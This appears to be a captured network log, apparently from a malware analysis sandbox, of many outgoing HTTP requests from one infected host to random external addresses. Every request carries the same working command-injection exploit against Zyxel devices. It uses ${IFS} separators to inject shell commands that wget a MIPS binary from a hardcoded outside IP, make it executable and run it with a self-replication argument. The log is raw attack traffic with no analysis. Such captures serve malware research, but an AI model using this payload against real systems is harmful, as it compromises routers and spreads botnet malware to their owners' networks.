                                              Jan 29, 2024 07:03:43.887712002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2882192.168.2.144462241.84.176.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887738943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2883192.168.2.145375242.27.126.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887789011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2884192.168.2.1460894216.54.22.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887809038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2885192.168.2.144094619.129.55.178443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887845993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2886192.168.2.144535090.238.58.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887875080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2887192.168.2.143802652.164.233.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887906075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2888192.168.2.1441000102.205.107.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887942076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2889192.168.2.143682239.247.30.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.887959003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2890192.168.2.14426282.64.235.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888017893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2891192.168.2.144159497.86.76.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888051987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2892192.168.2.1449158207.140.162.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888077974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2893192.168.2.1455936219.134.233.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888103962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2894192.168.2.144172292.97.132.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888133049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2895192.168.2.1456750183.162.80.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888183117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2896192.168.2.143693034.54.6.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888212919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2897192.168.2.145271684.23.132.43443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888243914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2898192.168.2.1439670206.144.171.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888288975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2899192.168.2.1439852220.14.89.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888326883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2900192.168.2.1456216102.123.214.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888359070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2901192.168.2.1460066187.188.22.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888375044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2902192.168.2.144059059.142.107.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888432980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2903192.168.2.145463493.175.156.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888453007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2904192.168.2.1435126198.127.217.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888494968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2905192.168.2.1456308132.159.169.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888549089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2906192.168.2.144070431.10.242.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888570070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2907192.168.2.1440400136.46.31.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888597012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2908192.168.2.145160459.63.159.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888639927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2909192.168.2.1434362148.75.108.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888689995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2910192.168.2.145353665.52.50.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888715029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2911192.168.2.1445952145.6.186.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888775110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2912192.168.2.1451118212.245.139.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888816118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2913192.168.2.144876695.17.201.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888859987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2914192.168.2.1438096120.21.93.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888890982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2915192.168.2.1435764206.154.149.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888915062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2916192.168.2.144444674.108.89.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.888971090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2917192.168.2.145821013.226.74.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889005899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2918192.168.2.1459434165.51.56.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889044046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2919192.168.2.143470444.144.197.159443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889082909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2920192.168.2.144102035.64.216.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889113903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2921192.168.2.1440686137.188.198.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889142036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2922192.168.2.14396421.10.233.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889179945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2923192.168.2.1432870159.128.116.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889226913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2924192.168.2.144864052.161.122.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889247894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2925192.168.2.1436680212.240.243.162443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889273882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2926192.168.2.1440608201.87.60.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889319897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2927192.168.2.145850257.244.126.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889357090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2928192.168.2.144261484.186.198.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889426947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2929192.168.2.144421646.104.117.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889436960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2930192.168.2.1441132150.30.56.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889461994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2931192.168.2.1448120173.112.5.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889518023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2932192.168.2.1446616128.33.222.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889555931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2933192.168.2.1450448108.197.30.28443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889590025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2934192.168.2.1447730161.163.175.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889631987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2935192.168.2.1439524162.224.183.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889678955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2936192.168.2.145053276.187.181.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889698982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2937192.168.2.1440908222.153.38.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889734983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2938192.168.2.1455484176.192.213.246443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889785051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2939192.168.2.144964661.77.67.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889806986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2940192.168.2.146045873.50.90.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889851093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2941192.168.2.145887014.228.50.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889890909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2942192.168.2.143545444.142.223.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889919996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2943192.168.2.144682277.125.230.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889972925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2944192.168.2.146003679.77.156.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:43.889993906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2945192.168.2.1443096123.141.94.104443
                                              TimestampBytes transferredDirectionData
